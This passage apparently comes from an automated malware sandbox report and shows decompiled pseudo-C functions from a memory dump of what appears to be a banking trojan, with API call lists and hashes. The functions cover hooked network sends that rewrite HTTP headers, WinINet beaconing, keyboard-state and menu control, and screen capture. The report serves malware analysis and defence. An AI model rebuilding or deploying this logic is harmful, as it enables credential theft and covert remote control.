        						_t92 = (_t90 & 0x000000ff) * _t124[0xb];
        						_t124[0xd] = _t92;
        						__eflags = _t92 & 0x00000003;
        						if((_t92 & 0x00000003) != 0) {
        							_t92 = (_t92 & 0xfffffffc) + 4;
        							__eflags = _t92;
        						}
        						_t124[0xd] = _t92;
        						E0040C1C2(_t119);
        						__eflags = _a4 - 1;
        						_v9 = 1;
        						if(_a4 != 1) {
        							goto L22;
        						}
        						_v9 = 0;
        						E0041341A( &_v1400);
        						E00413447(_t119,  &_v616);
        						_t43 =  &(_t124[0xf]); // 0x423ebc
        						E0040C1FE(_t43, 0x423b18, 0x10);
        						_t124[0x13] = _v138;
        						_t47 =  &(_t124[0x14]); // 0x423ed0
        						E0040C1FE(_t47,  &_v1141, 0x102);
        						E00413140(0x1898b122,  &_v128, 1);
        						_t107 = CreateMutexW(0x4238d8, 0,  &_v128);
        						_t124[0x58] = _t107;
        						__eflags = _t107;
        						if(_t107 == 0) {
        							goto L1;
        						}
        						_t108 = GetDC(0);
        						_a4 = _t108;
        						__eflags = _t108;
        						if(_t108 != 0) {
        							_t109 = CreateCompatibleDC(_t108);
        							_t124[0x55] = _t109;
        							__eflags = _t109;
        							if(_t109 != 0) {
        								_t111 = CreateCompatibleBitmap(_a4, 1, 1);
        								_t124[0x57] = _t111;
        								__eflags = _t111;
        								if(_t111 != 0) {
        									_t112 = SelectObject(_t124[0x55], _t111);
        									_t124[0x56] = _t112;
        									__eflags = _t112;
        									if(_t112 != 0) {
        										_v9 = 1;
        									}
        								}
        							}
        							ReleaseDC(0, _a4);
        						}
        					}
        					goto L22;
        				}
        				L1:
        				return 0;
        			}

        APIs
        • TlsAlloc.KERNEL32(00423E80,00000000,0000018C,00000000,00000000), ref: 00416789
        • RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 004167B1
        • CreateEventW.KERNEL32(004238D8,00000001,00000000,?,84889912,?,00000001), ref: 004167DB
        • CreateMutexW.KERNEL32(004238D8,00000000,?,18782822,?,00000001), ref: 004167FE
        • CreateFileMappingW.KERNEL32(00000000,004238D8,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 00416829
        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0041683F
        • GetDC.USER32(00000000), ref: 0041685C
        • GetDeviceCaps.GDI32(00000000,00000008), ref: 0041687C
        • GetDeviceCaps.GDI32(?,0000000A), ref: 00416886
        • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 00416899
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: Create$CapsDeviceFile$AllocBitmapCompatibleEventMappingMessageMutexRegisterViewWindow
        • String ID:
        • API String ID: 3765073151-0
        • Opcode ID: 2784f635248f6cdd828a06e8ec473bfad62f3b99f74f898d20854b94f90a40b8
        • Instruction ID: c4e02ad7d8ed0cd74ffe86ba3250f7285f305eb0699ddfbb52410a6b0036ad9e
        • Opcode Fuzzy Hash: 2784f635248f6cdd828a06e8ec473bfad62f3b99f74f898d20854b94f90a40b8
        • Instruction Fuzzy Hash: 28713FB1900748AFDB209FB1CD85EEBBBECEB08304F10493EF551E6651D679A9848B24
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00415A88(intOrPtr* _a4) {
        				char _v532;
        				void* _v536;
        				short _v540;
        				char* _v552;
        				void* _v568;
        				char _v570;
        				char _v572;
        				char _v576;
        				char* _v580;
        				void* _v592;
        				char _v596;
        				char _v600;
        				void* _v620;
        				void* _v624;
        				void* _v628;
        				char* _v632;
        				long _v648;
        				void _v652;
        				intOrPtr _v656;
        				char _v668;
        				intOrPtr _v672;
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				void* _t53;
        				void* _t56;
        				intOrPtr _t58;
        				void* _t63;
        				void* _t67;
        				void* _t94;
        				void* _t99;
        				char* _t101;
        				intOrPtr* _t109;
        				void* _t113;
        				intOrPtr* _t114;
        				signed int _t120;
        				void* _t122;
        
        				_t122 = (_t120 & 0xfffffff8) - 0x224;
        				_t109 = _a4;
        				if(E00410C20( &_v532,  *((intOrPtr*)(_t109 + 4))) == 0) {
        					L25:
        					return 0;
        				}
        				_t53 = InternetOpenA( *0x423b14, 0, 0, 0, 0);
        				_v536 = _t53;
        				if(_t53 == 0) {
        					L24:
        					E0040C1C2(_v552);
        					E0040C1C2(_v552);
        					goto L25;
        				}
        				_t56 = InternetConnectA(_t53, _v552, _v540, 0, 0, 3, 0, 0);
        				_v592 = _t56;
        				if(_t56 == 0) {
        					L23:
        					InternetCloseHandle(_v568);
        					goto L24;
        				}
        				_t58 =  *_t109;
        				_t101 = "POST";
        				if( *((char*)(_t58 + 0x18)) != 1) {
        					_t101 = "GET";
        				}
        				_t99 = HttpOpenRequestA(_v592, _t101, _v580, "HTTP/1.1",  *(_t58 + 8), 0, (0 | _v570 != 0x00000002) - 0x00000001 & 0x00800000 | 0x8404f700, 0);
        				_v620 = _t99;
        				if(_t99 == 0) {
        					L22:
        					InternetCloseHandle(_v624);
        					goto L23;
        				} else {
        					E00413447(_t101,  &_v576);
        					_t63 = 0xe;
        					E004128A5(_t63,  &_v600);
        					_t66 =  *_a4;
        					if( *((intOrPtr*)( *_a4 + 0x20)) > 0) {
        						_t94 = E0040CF86( &_v632,  &_v600,  *((intOrPtr*)(_t66 + 0x1c)));
        						_t122 = _t122 + 0xc;
        						if(_t94 > 0) {
        							HttpAddRequestHeadersA(_t99, _v632, 0xffffffff, 0xa0000000);
        							E0040C1C2(_v648);
        						}
        					}
        					_t67 = 0xf;
        					E004128A5(_t67,  &_v596);
        					_v628 = E0040CD11( &_v572);
        					_t113 = E0040C192(2 + _t69 * 6);
        					if(_t113 == 0) {
        						_t113 = 0;
        					} else {
        						E00410F4B(_t113,  &_v572, _v628);
        						_t99 = _v628;
        					}
        					if(_t113 != 0 && E0040CF86( &_v632,  &_v596, _t113) > 0) {
        						HttpAddRequestHeadersA(_t99, _v632, 0xffffffff, 0xa0000000);
        						E0040C1C2(_v648);
        					}
        					E0040C1C2(_t113);
        					_t114 = _a4;
        					if(HttpSendRequestA(_t99, 0, 0,  *( *_t114 + 0x24),  *( *_t114 + 0x28)) != 1) {
        						L21:
        						InternetCloseHandle(_t99);
        						goto L22;
        					} else {
        						_v648 = 4;
        						_v652 = 0;
        						if(HttpQueryInfoA(_t99, 0x20000013,  &_v652,  &_v648, 0) != 1 || _v672 != 0xc8) {
        							goto L21;
        						} else {
        							if(E0040E2F8( &_v668, _t99) != 0) {
        								E0040C1C2(_t80);
        							}
        							E0040C1C2(_v656);
        							E0040C1C2(_v656);
        							 *((intOrPtr*)(_t114 + 8)) = _v668;
        							goto L25;
        						}
        					}
        				}
        			}

        APIs
          • Part of subcall function 00410C20: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 00410C4F
        • InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 00415ABA
        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00415ADB
        • HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 00415B2A
        • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00415B81
        • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00415BF9
        • HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 00415C1C
        • HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 00415C44
        • InternetCloseHandle.WININET(00000000), ref: 00415C89
        • InternetCloseHandle.WININET(?), ref: 00415C93
          • Part of subcall function 0040E2F8: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0040E30C
          • Part of subcall function 0040E2F8: GetLastError.KERNEL32 ref: 0040E316
          • Part of subcall function 0040E2F8: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0040E336
          • Part of subcall function 0040C1C2: HeapFree.KERNEL32(00000000,00000000,0040D9B9,00000000,?,?,?,00412A7F,00000000,00412F59), ref: 0040C1D5
        • InternetCloseHandle.WININET(?), ref: 00415C9D
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: Internet$Http$Request$CloseHandleQuery$HeadersOpenOption$ConnectCrackErrorFreeHeapInfoLastSend
        • String ID: GET$HTTP/1.1$POST
        • API String ID: 1023423486-2753618334
        • Opcode ID: 8a33d638e098075d07a28905dcfe68c8e93b635b0cbec85da82b5a1953d58403
        • Instruction ID: 1045ac06f0503eb46e49225e69688b7bfeb0cead53b87b6ae1a33883b4bcb469
        • Opcode Fuzzy Hash: 8a33d638e098075d07a28905dcfe68c8e93b635b0cbec85da82b5a1953d58403
        • Instruction Fuzzy Hash: 1851B072104301EBC711AF61CD85DCBBFA9EFC4354F00092AF545A6172D739D985CB9A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 95%
        			E00416CA7(unsigned int __ecx, struct HWND__* _a4, signed short _a8) {
        				struct tagRECT _v20;
        				signed int _v24;
        				signed int _v28;
        				signed short _t37;
        				int _t46;
        				BYTE* _t47;
        				signed short _t51;
        				int _t63;
        				int _t64;
        				unsigned int _t65;
        				struct HMENU__* _t70;
        				struct HMENU__* _t74;
        				void* _t78;
        
        				_t65 = __ecx;
        				_t37 = _a8;
        				_t78 = _t37 - 0xfffffffd;
        				if(_t78 == 0) {
        					SetKeyboardState( *0x423e90);
        					L23:
        					SetEvent( *0x423e8c);
        					return 0;
        				}
        				if(_t78 <= 0 || _t37 > 0xffffffff) {
        					_v20.top = _t37 >> 0x10;
        					_v20.right = _t65 & 0x0000ffff;
        					_v20.left = _t37 & 0x0000ffff;
        					_v20.bottom = _t65 >> 0x10;
        					E0040A496( &_v20, _t65 >> 0x10, _t37 & 0x0000ffff, 0x423e80, _a4, 0);
        					goto L23;
        				} else {
        					_t70 = GetMenu(_a4);
        					if(_t70 == 0) {
        						goto L23;
        					}
        					_v24 = _v24 | 0xffffffff;
        					_t46 = GetMenuItemCount(_t70);
        					_t63 = 0;
        					_v28 = _t46;
        					if(_t46 <= 0) {
        						L8:
        						_t47 =  *0x423e90;
        						_push(_t47[0x104]);
        						_t64 = MenuItemFromPoint(_a4, _t70, _t47[0x100]);
        						if(_t64 == 0xffffffff) {
        							goto L23;
        						}
        						_v28 = GetMenuState(_t70, _t64, 0x400);
        						if(_v24 != _t64) {
        							EndMenu();
        						}
        						HiliteMenuItem(_a4, _t70, _t64, 0x480);
        						if(_a8 != 0xfffffffe && (_v28 & 0x00000003) == 0) {
        							if((_v28 & 0x00000010) == 0) {
        								if((_v28 & 0x00000800) == 0) {
        									_t51 = GetMenuItemID(_t70, _t64);
        									if(_t51 == 0xffffffff) {
        										goto L23;
        									}
        									L20:
        									SendMessageW(_a4, 0x111, _t51 & 0x0000ffff, 0);
        									goto L23;
        								}
        								_t51 = 0;
        								goto L20;
        							}
        							_t74 = GetSubMenu(_t70, _t64);
        							if(_t74 != 0 && GetMenuItemRect(_a4, _t70, _t64,  &_v20) != 0) {
        								TrackPopupMenuEx(_t74, 0x4000, _v20, _v20.bottom, _a4, 0);
        							}
        						}
        						goto L23;
        					} else {
        						goto L5;
        					}
        					do {
        						L5:
        						if(GetMenuState(_t70, _t63, 0x400) < 0) {
        							HiliteMenuItem(_a4, _t70, _t63, 0x400);
        							_v24 = _t63;
        						}
        						_t63 = _t63 + 1;
        					} while (_t63 < _v28);
        					goto L8;
        				}
        			}

        APIs
        • GetMenu.USER32(?), ref: 00416CD1
        • GetMenuItemCount.USER32 ref: 00416CE7
        • GetMenuState.USER32 ref: 00416CFF
        • HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 00416D0F
        • MenuItemFromPoint.USER32(?,00000000,?,?), ref: 00416D35
        • GetMenuState.USER32 ref: 00416D49
        • EndMenu.USER32 ref: 00416D59
        • HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 00416D69
        • GetSubMenu.USER32 ref: 00416D8D
        • GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 00416DA7
        • TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 00416DC8
        • GetMenuItemID.USER32(00000000,00000000), ref: 00416DE0
        • SendMessageW.USER32(?,00000111,?,00000000), ref: 00416DF9
        • SetKeyboardState.USER32 ref: 00416E38
        • SetEvent.KERNEL32 ref: 00416E44
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: Menu$Item$State$Hilite$CountEventFromKeyboardMessagePointPopupRectSendTrack
        • String ID:
        • API String ID: 751066993-0
        • Opcode ID: 08266eebd79fe2778399582e0d8a9c367f48cf74a8e2688874db107420701d0c
        • Instruction ID: 203a56d81326ceb3e810a1155a4380fa8d9e50ebc72021fe374a88135e3552f4
        • Opcode Fuzzy Hash: 08266eebd79fe2778399582e0d8a9c367f48cf74a8e2688874db107420701d0c
        • Instruction Fuzzy Hash: 7941E134100344AFD7118F28DE88AAF7AA8EB84765F01472EF868A11F0C734CD91DB69
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040FEA8() {
        				struct HINSTANCE__* _t2;
        				_Unknown_base(*)()* _t7;
        				void* _t9;
        				intOrPtr _t16;
        				intOrPtr _t18;
        
        				if( *0x423784 != 0) {
        					L9:
        					 *0x423784 =  *0x423784 + 1;
        					return 1;
        				} else {
        					_t2 = LoadLibraryA("cabinet.dll");
        					 *0x423780 = _t2;
        					if(_t2 == 0) {
        						L8:
        						return 0;
        					} else {
        						 *0x422dac = GetProcAddress(_t2, "FCICreate");
        						 *0x423770 = GetProcAddress( *0x423780, "FCIAddFile");
        						 *0x4229a4 = GetProcAddress( *0x423780, "FCIFlushCabinet");
        						_t7 = GetProcAddress( *0x423780, "FCIDestroy");
        						 *0x423778 = _t7;
        						_t16 =  *0x422dac; // 0x0
        						if(_t16 == 0 ||  *0x423770 == 0) {
        							L7:
        							FreeLibrary( *0x423780);
        							goto L8;
        						} else {
        							_t18 =  *0x4229a4; // 0x0
        							if(_t18 == 0 || _t7 == 0) {
        								goto L7;
        							} else {
        								_t9 = HeapCreate(0, 0x80000, 0);
        								 *0x4229a0 = _t9;
        								if(_t9 != 0) {
        									goto L9;
        								} else {
        									goto L7;
        								}
        							}
        						}
        					}
        				}
        			}

        APIs
        • LoadLibraryA.KERNEL32(cabinet.dll,00000000,0040FF8F,?,004101AB,?,?,00000000,?), ref: 0040FEBC
        • GetProcAddress.KERNEL32(00000000,FCICreate), ref: 0040FEDC
        • GetProcAddress.KERNEL32(FCIAddFile), ref: 0040FEEE
        • GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 0040FF00
        • GetProcAddress.KERNEL32(FCIDestroy), ref: 0040FF12
        • HeapCreate.KERNEL32(00000000,00080000,00000000,004101AB,?,?,00000000,?), ref: 0040FF3D
        • FreeLibrary.KERNEL32(004101AB,?,?,00000000,?), ref: 0040FF52
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: AddressProc$Library$CreateFreeHeapLoad
        • String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$cabinet.dll
        • API String ID: 2040708800-1163896595
        • Opcode ID: 1d41957bb78e244d980a65dc0cd5259c8aa7619fc0701b0572c4ba8d1029d2be
        • Instruction ID: bcb643627350da741764bb36b1f46cc7c169d78bcd3ed2816b7aef1129235f4a
        • Opcode Fuzzy Hash: 1d41957bb78e244d980a65dc0cd5259c8aa7619fc0701b0572c4ba8d1029d2be
        • Instruction Fuzzy Hash: 7D11E8F0B41610BECA32AF25AD049167EB5F7C5B523A4467BE500A26A0D7791546AA0C
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 81%
        			E00405B12(void* __edx, intOrPtr _a4, signed int _a8, signed char _a12) {
        				intOrPtr _v20;
        				void* _v24;
        				intOrPtr _v36;
        				intOrPtr _v40;
        				void* _v44;
        				void* _v60;
        				signed int _v72;
        				char _v76;
        				signed int _v80;
        				signed int _v84;
        				signed char _v88;
        				signed int _v92;
        				void* _v96;
        				intOrPtr _v104;
        				signed int _v108;
        				void* _v112;
        				void* _v132;
        				void* __esi;
        				signed int _t111;
        				signed int _t113;
        				signed char _t114;
        				signed int _t115;
        				void* _t117;
        				signed char _t121;
        				signed int _t122;
        				signed int _t125;
        				signed int _t128;
        				signed char _t130;
        				signed char _t136;
        				intOrPtr _t149;
        				void* _t165;
        				signed char _t166;
        				void* _t172;
        				intOrPtr _t178;
        				signed int _t184;
        				void* _t186;
        				void* _t188;
        				signed int _t202;
        				signed int _t203;
        				signed int _t205;
        				void* _t207;
        
        				_t207 = (_t205 & 0xfffffff8) - 0x5c;
        				if(E004132A1() == 0 || _a8 == 0 || _a12 <= 0) {
        					L9:
        					_t111 =  *0x4223b0(_a4, _a8, _a12);
        					goto L10;
        				} else {
        					EnterCriticalSection(0x4223c0);
        					_t192 = _a4;
        					_t184 = L00404B96(_a4);
        					_v84 = _t184;
        					if(_t184 == 0xffffffff) {
        						L8:
        						LeaveCriticalSection(0x4223c0);
        						goto L9;
        					}
        					_t186 = _t184 * 0x38 +  *0x4223dc;
        					if( *(_t186 + 0x20) > 0) {
        						L29:
        						_t113 =  *(_t186 + 0x24);
        						_t188 =  *(_t186 + 0x20) - _t113;
        						LeaveCriticalSection(0x4223c0);
        						_t195 = _a4;
        						_t114 =  *0x4223b0(_a4,  *((intOrPtr*)(_t186 + 0x1c)) + _t113, _t188);
        						_v88 = _t114;
        						__eflags = _t114 - 0xffffffff;
        						if(_t114 != 0xffffffff) {
        							EnterCriticalSection(0x4223c0);
        							_t115 = L00404B96(_t195);
        							__eflags = _t115 - 0xffffffff;
        							if(_t115 != 0xffffffff) {
        								_t166 = _v88;
        								_t117 = _t115 * 0x38 +  *0x4223dc;
        								__eflags = _t166 - _t188;
        								if(_t166 != _t188) {
        									 *((intOrPtr*)(_t117 + 0x24)) =  *((intOrPtr*)(_t117 + 0x24)) + _t166;
        									_t92 = _t117 + 0x28;
        									 *_t92 =  *(_t117 + 0x28) - 1;
        									__eflags =  *_t92;
        									_v88 = 1;
        								} else {
        									_t88 = _t117 + 0x1c; // -4334528
        									_v88 =  *(_t117 + 0x28);
        									E0040C275(E0040C1C2( *_t88), _t88, 0, 0x10);
        								}
        							} else {
        								_v88 = _v88 | _t115;
        								 *0x4223bc(0xffffe890, 8);
        							}
        							LeaveCriticalSection(0x4223c0);
        						}
        						L36:
        						_t111 = _v88;
        						L10:
        						return _t111;
        					}
        					if( *(_t186 + 8) > 0) {
        						L38:
        						LeaveCriticalSection(0x4223c0);
        						_t197 = _a4;
        						_t121 =  *0x4223b0(_a4, _a8, _a12);
        						_v88 = _t121;
        						__eflags = _t121 - 0xffffffff;
        						if(_t121 != 0xffffffff) {
        							EnterCriticalSection(0x4223c0);
        							_t122 = L00404B96(_t197);
        							__eflags = _t122 - 0xffffffff;
        							if(_t122 != 0xffffffff) {
        								_t172 = _t122 * 0x38 +  *0x4223dc;
        								_t178 =  *((intOrPtr*)(_t172 + 8));
        								__eflags = _v88 - _t178;
        								if(_v88 > _t178) {
        									E00404C54(_t122);
        								} else {
        									 *((intOrPtr*)(_t172 + 8)) = _t178 - _v88;
        								}
        							} else {
        								_v88 = _v88 | _t122;
        								 *0x4223bc(0xffffe890, 8);
        							}
        							LeaveCriticalSection(0x4223c0);
        						}
        						goto L36;
        					}
        					_t125 = E0040508A( &_v76, _t192, _a8, _a12);
        					_v92 = _t125;
        					if(_t125 != 0xffffffff) {
        						__eflags = _v72;
        						if(_v72 == 0) {
        							L37:
        							E004159FB( &_v76);
        							_t128 = _v80 + _a12;
        							__eflags = _t128;
        							 *(_t186 + 8) = _t128;
        							goto L38;
        						}
        						_t130 = E004150CD( &_v76);
        						_v88 = _t130;
        						__eflags = _t130 & 0x00000001;
        						if((_t130 & 0x00000001) == 0) {
        							_v92 = 0;
        							_v88 = 0;
        							__eflags = _t130 & 0x00000002;
        							if(__eflags != 0) {
        								_t203 = E0040C215(__eflags, _a8, _a12);
        								 *(_t207 + 0x10) = _t203;
        								__eflags = _t203;
        								if(_t203 != 0) {
        									E00415A65( *((intOrPtr*)(_t186 + 0x10)),  *((intOrPtr*)(_t186 + 0xc)));
        									E0040C1C2( *(_t186 + 0x14));
        									E0040C1C2( *((intOrPtr*)(_t186 + 4)));
        									_t149 = E0040C620(_v76, _v80);
        									 *(_t186 + 0x14) =  *(_t186 + 0x14) & 0x00000000;
        									_t38 = _t186 + 0x18;
        									 *_t38 =  *(_t186 + 0x18) & 0x00000000;
        									__eflags =  *_t38;
        									 *((intOrPtr*)(_t186 + 4)) = _t149;
        									 *((intOrPtr*)(_t186 + 0xc)) = _v36;
        									 *((intOrPtr*)(_t186 + 0x10)) =  *((intOrPtr*)(_t207 + 0x68));
        									 *((intOrPtr*)(_t207 + 0x14)) = E004110E9(E004110E9(E00411165(_t203, _a12, "Accept-Encoding", "identity"), _t165, _t203, "TE"), _t165, _t203, "If-Modified-Since");
        								} else {
        									E00415A65( *((intOrPtr*)(_t207 + 0x60)), _v20);
        								}
        							}
        							__eflags = _v84 & 0x00000004;
        							if((_v84 & 0x00000004) == 0) {
        								L27:
        								__eflags = _v92;
        								if(_v92 == 0) {
        									goto L37;
        								}
        								E004159FB( &_v76);
        								_t70 = _t186 + 0x24;
        								 *_t70 =  *(_t186 + 0x24) & 0x00000000;
        								__eflags =  *_t70;
        								 *(_t186 + 8) = _v80;
        								 *((intOrPtr*)(_t186 + 0x1c)) = _v92;
        								 *(_t186 + 0x20) = _v88;
        								 *(_t186 + 0x28) = _a12;
        								goto L29;
        							}
        							_t202 = _v92;
        							__eflags = _t202;
        							if(__eflags != 0) {
        								_t136 = _v88;
        							} else {
        								_t202 = _a8;
        								_t136 = _a12;
        							}
        							_v84 = _t136;
        							_v104 = E0040536A(_v84, __eflags, _t202, _v40, _v36,  &_v92);
        							E0040C1C2( *((intOrPtr*)(_t207 + 0x44)));
        							__eflags = _v108;
        							if(_v108 != 0) {
        								__eflags = _t202 - _a8;
        								if(_t202 != _a8) {
        									E0040C1C2(_t202);
        								}
        							} else {
        								__eflags = _t202 - _a8;
        								if(_t202 == _a8) {
        									goto L37;
        								}
        								_v92 = _t202;
        								_v88 = _v84;
        							}
        							goto L27;
        						} else {
        							E004159FB( &_v76);
        							LeaveCriticalSection(0x4223c0);
        							_t111 =  *0x4223bc(0xffffe8a3, 0) | 0xffffffff;
        							goto L10;
        						}
        					} else {
        						E00404C54(_v84);
        						E004159FB( &_v76);
        						goto L8;
        					}
        				}
        			}













































        APIs
          • Part of subcall function 004132A1: WaitForSingleObject.KERNEL32(00000000,00407D52,00000310,00000000,00000310,909011A5,00000002), ref: 004132A9
        • EnterCriticalSection.KERNEL32(004223C0), ref: 00405B39
        • LeaveCriticalSection.KERNEL32(004223C0), ref: 00405B97
        • LeaveCriticalSection.KERNEL32(004223C0,?), ref: 00405BDE
        • LeaveCriticalSection.KERNEL32(004223C0), ref: 00405D49
        • EnterCriticalSection.KERNEL32(004223C0), ref: 00405D68
        • LeaveCriticalSection.KERNEL32(004223C0), ref: 00405DCA
        • LeaveCriticalSection.KERNEL32(004223C0), ref: 00405DF3
        • EnterCriticalSection.KERNEL32(004223C0), ref: 00405E12
        • LeaveCriticalSection.KERNEL32(004223C0), ref: 00405E5A
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: CriticalSection$Leave$Enter$ObjectSingleWait
        • String ID: Accept-Encoding$If-Modified-Since$identity
        • API String ID: 3286975823-3034467039
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E004169DB(void** __eax, char _a4) {
        				void* __esi;
        				void* _t15;
        				void* _t16;
        				long _t17;
        				void* _t18;
        				void* _t19;
        				void* _t20;
        				void* _t21;
        				void* _t22;
        				struct HDC__* _t23;
        				void* _t24;
        				void* _t25;
        				void** _t41;
        
        				_t41 = __eax;
        				_t15 =  *(__eax + 0x1c);
        				if(_t15 != 0) {
        					DeleteObject(_t15);
        				}
        				_t16 = _t41[3];
        				if(_t16 != 0) {
        					CloseHandle(_t16);
        				}
        				_t17 = _t41[1];
        				if(_t17 != 0xffffffff) {
        					TlsFree(_t17);
        				}
        				_t18 = _t41[5];
        				if(_t18 != 0) {
        					CloseHandle(_t18);
        				}
        				_t19 = _t41[4];
        				if(_t19 != 0) {
        					UnmapViewOfFile(_t19);
        				}
        				_t20 =  *_t41;
        				if(_t20 != 0) {
        					_t20 = CloseHandle(_t20);
        				}
        				if(_a4 != 0) {
        					_t21 = _t41[0x56];
        					if(_t21 != 0) {
        						SelectObject(_t41[0x55], _t21);
        					}
        					_t22 = _t41[0x57];
        					if(_t22 != 0) {
        						DeleteObject(_t22);
        					}
        					_t23 = _t41[0x55];
        					if(_t23 != 0) {
        						DeleteDC(_t23);
        					}
        					_t24 = _t41[0x58];
        					if(_t24 != 0) {
        						CloseHandle(_t24);
        					}
        					_t25 = _t41[0x60];
        					if(_t25 != 0 && WaitForSingleObject(_t25, 0) != 0x102) {
        						PostThreadMessageW(_t41[0x62], 0x12, 0, 0);
        					}
        					_t20 = E0040DBD1( &(_t41[0x5f]));
        				}
        				return _t20;
        			}

















        APIs
        • DeleteObject.GDI32(?), ref: 004169EE
        • CloseHandle.KERNEL32(?,00000000,00423E80,00000000,00416BE5,00000000,00000000,0000004C,2937498D,?,00000000), ref: 004169FE
        • TlsFree.KERNEL32(?,00000000,00423E80,00000000,00416BE5,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00416A09
        • CloseHandle.KERNEL32(?,00000000,00423E80,00000000,00416BE5,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00416A17
        • UnmapViewOfFile.KERNEL32(?,00000000,00423E80,00000000,00416BE5,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00416A21
        • CloseHandle.KERNEL32(?,00000000,00423E80,00000000,00416BE5,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00416A2E
        • SelectObject.GDI32(?,?), ref: 00416A48
        • DeleteObject.GDI32(?), ref: 00416A59
        • DeleteDC.GDI32(?), ref: 00416A66
        • CloseHandle.KERNEL32(?,00000000,00423E80,00000000,00416BE5,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00416A77
        • WaitForSingleObject.KERNEL32(?,00000000,00000000,00423E80,00000000,00416BE5,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00416A86
        • PostThreadMessageW.USER32 ref: 00416A9F
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: CloseHandleObject$Delete$FileFreeMessagePostSelectSingleThreadUnmapViewWait
        • String ID:
        • API String ID: 1699860549-0
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040AC77(void* __eax, signed int __ecx, void* __edx, RECT* __edi, long _a4, intOrPtr _a8) {
        				char _v5;
        				long _v12;
        				signed char _v16;
        				struct tagRECT _v32;
        				char _v140;
        				void* __ebx;
        				void* __esi;
        				signed char _t47;
        				intOrPtr _t52;
        				void* _t85;
        				RECT* _t89;
        
        				_t89 = __edi;
        				_t86 = __ecx;
        				_t85 = __eax;
        				_t47 = E00416709(_a4) & 0x0000ffff;
        				_v16 = _t47;
        				if((_t47 & 0x00000001) != 0) {
        					L16:
        					return 1;
        				}
        				if(GetWindowThreadProcessId(_a4,  &_v12) == 0) {
        					_v5 = 0;
        				} else {
        					_t86 =  &_v140;
        					E0041081B( &_v140, _t85 + 0x3c, _v12, _t85 + 0x50, 2);
        					_v5 = E0040F9A5( &_v140);
        				}
        				if(_v5 == 0 || (_v16 & 0x00000010) != 0) {
        					L8:
        					if(E0040AB15(_t85, _t86) == 0) {
        						L14:
        						_t52 = _a8;
        						if(( *(_t52 + 0x24) & 0x40000000) == 0) {
        							IntersectRect( &_v32, _t52 + 4, _t89);
        							FillRect( *(_t85 + 0x154),  &_v32, 6);
        							DrawEdge( *(_t85 + 0x154),  &_v32, 0xa, 0xf);
        						}
        						goto L16;
        					}
        					E0040C1FE( *((intOrPtr*)(_t85 + 0x10)) + 0x114, _t89, 0x10);
        					ResetEvent( *(_t85 + 0xc));
        					if(PostThreadMessageW( *(_t85 + 0x188),  *(_t85 + 8), 0xfffffffc, _a4) == 0) {
        						goto L14;
        					}
        					if(WaitForSingleObject( *(_t85 + 0xc), 0x3e8) != 0) {
        						TerminateProcess( *(_t85 + 0x17c), 0);
        						E0040DBD1(_t85 + 0x17c);
        						goto L14;
        					}
        					if( *((char*)( *((intOrPtr*)(_t85 + 0x10)) + 0x124)) != 1) {
        						goto L14;
        					}
        					return _v5;
        				} else {
        					ResetEvent( *(_t85 + 0xc));
        					_t86 = _t89->left & 0x0000ffff;
